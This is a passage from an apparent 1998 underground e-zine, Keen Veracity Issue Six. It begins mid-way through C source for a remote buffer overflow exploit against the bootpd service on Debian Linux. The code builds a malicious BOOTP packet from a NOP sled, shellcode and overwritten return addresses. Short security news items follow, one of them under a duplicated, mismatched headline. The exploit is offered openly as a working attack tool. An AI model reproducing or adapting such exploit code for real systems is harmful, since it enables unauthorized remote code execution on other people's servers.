(sendto(s, (const void *) bp, MAX_MSG_SIZE, 0, (const struct sockaddr *) &server_addr, sizeof(struct sockaddr_in)) == -1) { fprintf(stderr, "sendpacket: sendto returned -1 ;(\n"); exit(1); } } void build_packet(struct bootp *bp, int argc, char *argv[]) { unsigned long start_realpath = 0xbffff684 + realpath_adjust; unsigned long addr_ret_addr = start_realpath + 8 + 0x488; unsigned long temp_addr, temp_addr2 = 0; int length_tftpdir = 1; // no ftpdir just a slash at the start.. int num_nops = 600; char *p; unsigned long *q; int i; bp->bp_op = BOOTREQUEST; bp->bp_xid = 58524; bp->bp_htype = HTYPE_ETHERNET; bp->bp_hlen = 6; bp->bp_ciaddr.s_addr = inet_addr(client_addr); printf("Using: client: %s\n", client_addr); printf("Using: server: %s\n", host_addr); printf("Addr of realpath: %x\n", start_realpath); p = bp->bp_file; /* Putting in nops */ for (i = 0; i < num_nops; i++) *p++ = 0x90; printf("Added: %d nops\n", num_nops); /* Putting in shellcode */ for(i = 0; i < strlen(shellcode); i++) *p++ = shellcode[i]; printf("%d bytes of shellcode added.\n", strlen(shellcode)); /* Aligning to make sure the ret_addr is placed correctly */ temp_addr = p - bp->bp_file + length_tftpdir + start_realpath; for(i = 0; i < (addr_ret_addr - temp_addr) % 4; i++) *p++ = 'a'; printf("%d bytes of alignment added.\n", (addr_ret_addr - temp_addr) %4); /* set return adress.. hopefully in exploit code.... */ temp_addr2 = start_realpath + length_tftpdir + (num_nops / 2); if (!(temp_addr2 & 0xff)) temp_addr2++; printf("Setting return addr to: %x \n", temp_addr2); q = (unsigned long *) p; do { *q++ = temp_addr2; p = (char *) q; } while ((p - bp->bp_file) < exploit_length); *p++ = '\0'; printf("Exploit length: %d \n", strlen(bp->bp_file)); } void get_args(int argc, char *argv[]) { int ch; while ((ch = getopt(argc, argv, "c:s:a:e:")) != EOF) { switch(ch) { case 'c': strcpy(client_addr, optarg); break; case 's': strcpy(host_addr, optarg); break; case 'a': realpath_adjust = atoi(optarg); break; case 'e': exploit_length = atoi(optarg); break; default: usage(); } } } void usage(void) { printf("bootpd exploit against debian linux 1.3 and 2.0 (probably others)\n"); printf("\nBy Willem Pinckaers (W.H.J.Pinckaers@cpedu.rug.nl) 1998\n"); printf("\nUsage:\n\tbootpd: -c client_addr -s server_addr -a offset\n"); exit(1); } Files Compiled with the zip version of Keen Veracity Issue Six: o bootpd.h o bootpd.c o bptypes.h =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= In the news sources =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= __________________________________________ OpenPGP Wins IETF Proposed Standard Status __________________________________________ OpenPGP, the open standards version of Network Associates Inc.'s PGP (Pretty Good Privacy) encryption technology, has received a promotion. According to a statement issued by network Associates, OpenPGP has been promoted to "Proposed Standard" status by the Internet Engineering Tak Force. With this promption, Network Associates also granted full change control over OpenPGP protocols. __________________________________________ VLSI Licenses RSA Technology for Networking Security Chip ------------------------------------------- RSA Data Security Inc. of San Mateo, CA, announced that VLSI Tecnology Inc., a San Jose CA, maker of system-on-a-chip custom ICs, has incorporated RSA's security technology into a new Internet Protocol Security (IPSEC) coprocessor chip. The VLSI chip will be used in networking hardwrae for Internet commerce applications, says RSA. Key commercial applications for VLSI security chips include electronic commerce, cable modems, satellite data transmission, voice and data communications and consumer video. __________________________________________ IDSL NIC Goes Interoperable with Cisco 901 Multiplexer ------------------------------------------- Xpeed Inc., a Santa Clara, CA, supplier of high-performance low cost connectivity devices for digital subscriber line (DLS) connections, announced that its Model 200 IDSL network adapter has been tested and certified by Cisco Systems as interoperable with Cisco's 90i central office system. The PCI adaptor, which is scheduled to ship later this month, was tested and certified by Cisco's Laboratories as fully compatible with it's 90i Channel Unit for d4 chennel bank frame multiplexers. __________________________________________ IDSL NIC Goes Interoperable with Cisco 901 Multiplexer ------------------------------------------- DNA evidence is now a prominent part of criminal trials. Researchers at the IBM Wat-son Research Laboratory think they can apply the lessons of forensic science to the hunt for computer hackers. They have developed a computer algorithm to learn about strands of DNA. Giving it the name "Teiresias," for a blind seer in Greek folklore, it has been put to work on spotting patterns that could catch hackers at work. Modern computers are fast enough to detect the patterns hackers are using to brek into a network (Wired) ------------------------------------------- *--------------------------------------------------* | Legions of the Underground | | www.legions.org | | Submissions = digi@wintermute.linux.tc | | Distro Information = webmaster@legions.org | *--------------------------------------------------* --------------------------------------------------------------------------- This has been a Legions of the Underground Production ---------------------------------------------------------------------------